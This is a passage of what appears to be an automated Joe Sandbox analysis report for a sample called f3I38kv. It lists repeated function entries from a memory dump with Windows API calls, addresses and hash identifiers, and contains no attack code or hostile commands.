                                                            APIs
                                                              • Part of subcall function 004FC27E: _wcslen.LIBCMT ref: 004FC284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA30C
                                                            • GetLastError.KERNEL32(?,?,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: 7dac5325df2fb0ac6cf2e8ad128b70bed2db92dd756a491137dd92e9daedc707
                                                            • Instruction ID: f84004a67f16cc771003a7321e877caf84efe4a135354a20dac1244216bbd36c
                                                            • Opcode Fuzzy Hash: 7dac5325df2fb0ac6cf2e8ad128b70bed2db92dd756a491137dd92e9daedc707
                                                            • Instruction Fuzzy Hash: F401F9B560021C59EF219B718C49BFF3388DF0A384F04045AFF05D2281D75CCA9196BB
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0051B8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: bee4ac98695ee3b7c968663795460145c3e6ab5b3fc1049d5ef18dd156c56357
                                                            • Instruction ID: 1f161bbbe0179fa7050edee51acf6660933da162594569a345f429b1419cbd29
                                                            • Opcode Fuzzy Hash: bee4ac98695ee3b7c968663795460145c3e6ab5b3fc1049d5ef18dd156c56357
                                                            • Instruction Fuzzy Hash: F641D87050428C9AFB228E648C84BF6BFBDFF55304F1408EDE59A86142D335AA86DF60
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0051AFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: 6bd78d4abc8539a25e894a128066d6a2bb4942227c9d701ffc5629c90d9d0748
                                                            • Instruction ID: 6450db2f34c80bdc9900b459f6515fecaabe62a07e8b707884e07d445ac440b0
                                                            • Opcode Fuzzy Hash: 6bd78d4abc8539a25e894a128066d6a2bb4942227c9d701ffc5629c90d9d0748
                                                            • Instruction Fuzzy Hash: EB01023650521ABBDF129F90EC06DEE7F62FF4D750F014158FA14261A0CA368AA2AB81
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0051A56F), ref: 0051AF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 641d945ff3f991fc3d5db879b4aa3640e9173820f144a271d315ead128e7fd14
                                                            • Instruction ID: 72246dcb9f8a62eb3bffbe7c5ec2102c6584b9776445e307d38bd8d2a7df6919
                                                            • Opcode Fuzzy Hash: 641d945ff3f991fc3d5db879b4aa3640e9173820f144a271d315ead128e7fd14
                                                            • Instruction Fuzzy Hash: 1BF0B43564621CBBCB129F50DC07CAE7F61FF59711B004054FC08562A0DA714E51ABC5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: dc97c3a4f8457ffff857db3d36a03685d2a0c60f5cc413206ff95bd5c80b36b2
                                                            • Instruction ID: 92cb943da5ee90e7b40f19aa4bf9b27e9309fb09b975a537fe06b1fd15b403c4
                                                            • Opcode Fuzzy Hash: dc97c3a4f8457ffff857db3d36a03685d2a0c60f5cc413206ff95bd5c80b36b2
                                                            • Instruction Fuzzy Hash: 6EE0553064232CBBD322AB24EC079AEBF50FF5AB20B000098F80093280CD744E8296C6
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 031ac59e3e520a557eecee9098fec5475fcb441d8d821df34431b73982a48c17
                                                            • Instruction ID: b4fda5caa704d96927f24e7a4f7dab4c29aa536ea8822e403a5e2a81fe04f616
                                                            • Opcode Fuzzy Hash: 031ac59e3e520a557eecee9098fec5475fcb441d8d821df34431b73982a48c17
                                                            • Instruction Fuzzy Hash: 77B092A625C901AC620411556827C3F0D0CEAC2B113308C3ABC05C08C19850AC054431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: e93c27a34f70b7b1595150d542d64b16f442cb8dd7cc0c15db0002c7c97599cf
                                                            • Instruction ID: d6ab59431a995fd477014f50548cf30879ba17a27ebe1b8980866e66884ab57e
                                                            • Opcode Fuzzy Hash: e93c27a34f70b7b1595150d542d64b16f442cb8dd7cc0c15db0002c7c97599cf
                                                            • Instruction Fuzzy Hash: 5CB092A225D801AC620452152817C3E0D4CEAC2B11330C82ABC09C01C19850A8094831
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: afc3d1f0b3eb5e2767b35a9eccdaf10d4f832c58ffd6e2e95e87801eb3d1eeb0
                                                            • Instruction ID: e1b8a3d72727d9c153712d48abd7afc3fbda75c208b8522c3bd89a7ac662d0f7
                                                            • Opcode Fuzzy Hash: afc3d1f0b3eb5e2767b35a9eccdaf10d4f832c58ffd6e2e95e87801eb3d1eeb0
                                                            • Instruction Fuzzy Hash: F9B092A625C901AC720451696817C3F0D4CFAC2B11330883AB809C04C19850AC054531
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 23775096d1207fb149daa0ea88c81cc84f51360f96a37fcd704f9e5a697aaba0
                                                            • Instruction ID: c208235e048d9f2c96489025d9ebf12bc02b6e13448083045a08a7d73885826e
                                                            • Opcode Fuzzy Hash: 23775096d1207fb149daa0ea88c81cc84f51360f96a37fcd704f9e5a697aaba0
                                                            • Instruction Fuzzy Hash: 6FB092B225D941AC624552152817C3E0D4DEAC2B11330892AB809C00C19850A8494431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 0aca192835326febae29d3c3a51a899c8925b452a69297b2db52341975c37506
                                                            • Instruction ID: a7cc360c82e0829bd15e57a5dd3d9a761890bbcc362f487b0434b08056a7fd8d
                                                            • Opcode Fuzzy Hash: 0aca192835326febae29d3c3a51a899c8925b452a69297b2db52341975c37506
                                                            • Instruction Fuzzy Hash: 43B092A225D841AC620451152817C3E0D4DEAC2B11330882ABC09C00C19850A8054431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 5f79c896c02d09cadca75448928fcf9121f9cd9bd6445d8a56aefc5d6482b715
                                                            • Instruction ID: 8e33f6cbb8c3eb6807aa140481a00785b54221707842cafd4b84429110d8698f
                                                            • Opcode Fuzzy Hash: 5f79c896c02d09cadca75448928fcf9121f9cd9bd6445d8a56aefc5d6482b715
                                                            • Instruction Fuzzy Hash: C8B092A226D841AC720451252817C3E0D8DFAC2B11330882AB80AC00C19850A8054431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 30687e46d8d4f5a8c9aa4e5f6d91a60bc0def3c4bebbadd8ecccbb11842be9d0
                                                            • Instruction ID: 861192190751e27255c47d883f6d672abb2e97019bbf24d3a5271e2eacb73383
                                                            • Opcode Fuzzy Hash: 30687e46d8d4f5a8c9aa4e5f6d91a60bc0def3c4bebbadd8ecccbb11842be9d0
                                                            • Instruction Fuzzy Hash: 3FB092A225C801AC620451662817C3E0D8CEAC2B11330882ABC09C00C19850A8054431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 66b873eef37f0fdbc0a98211b8d049a584c7b0ce86da0c02fb26ad338a186963
                                                            • Instruction ID: 1c953dbbfcd95e5768fc8eebe19795e52b8fb2d2577f1e062e852846c8e20d1f
                                                            • Opcode Fuzzy Hash: 66b873eef37f0fdbc0a98211b8d049a584c7b0ce86da0c02fb26ad338a186963
                                                            • Instruction Fuzzy Hash: 98B092B225C901AC620451152817C3E0D4CEAC2B11330882ABC09C00C19850A9054431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: a8c9057f4bc76bdf21e00274251a2a9ab018e356f2d8862ffb0eaad9091fd2b3
                                                            • Instruction ID: 2ab66f687ff4d4922b7b09d0fd489c3496a2b3ba43ba9d7b3417849f28d78d68
                                                            • Opcode Fuzzy Hash: a8c9057f4bc76bdf21e00274251a2a9ab018e356f2d8862ffb0eaad9091fd2b3
                                                            • Instruction Fuzzy Hash: 7BB092A235C941AC624552152817C3E0D4CEAC2B11330892AB809C01C19850A8494831
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 654cb87db6b09a81a63750021144e0aa1517226f2e6c69240a0889b0be4c3b76
                                                            • Instruction ID: 0628c8545bdb036bcecb1e01d2e1373bacc7cc092387fa8034cac2061800648d
                                                            • Opcode Fuzzy Hash: 654cb87db6b09a81a63750021144e0aa1517226f2e6c69240a0889b0be4c3b76
                                                            • Instruction Fuzzy Hash: 3FB092A225C801AC620452152917C3E0D4CEAC2B11330882AB809C01C19860A90A4831
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: ab981a02f124a411a5e5a224c33c6e5c421e31406c20558dee8aa54efd98c7ec
                                                            • Instruction ID: e71871dca9195df0b605157a67ca56f6067cbac75b50a818139a6517b29f036a
                                                            • Opcode Fuzzy Hash: ab981a02f124a411a5e5a224c33c6e5c421e31406c20558dee8aa54efd98c7ec
                                                            • Instruction Fuzzy Hash: 6FB092B225C801AC620451152917C3E0D4CEAC2B11330882AB809C00C1E850AA064431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
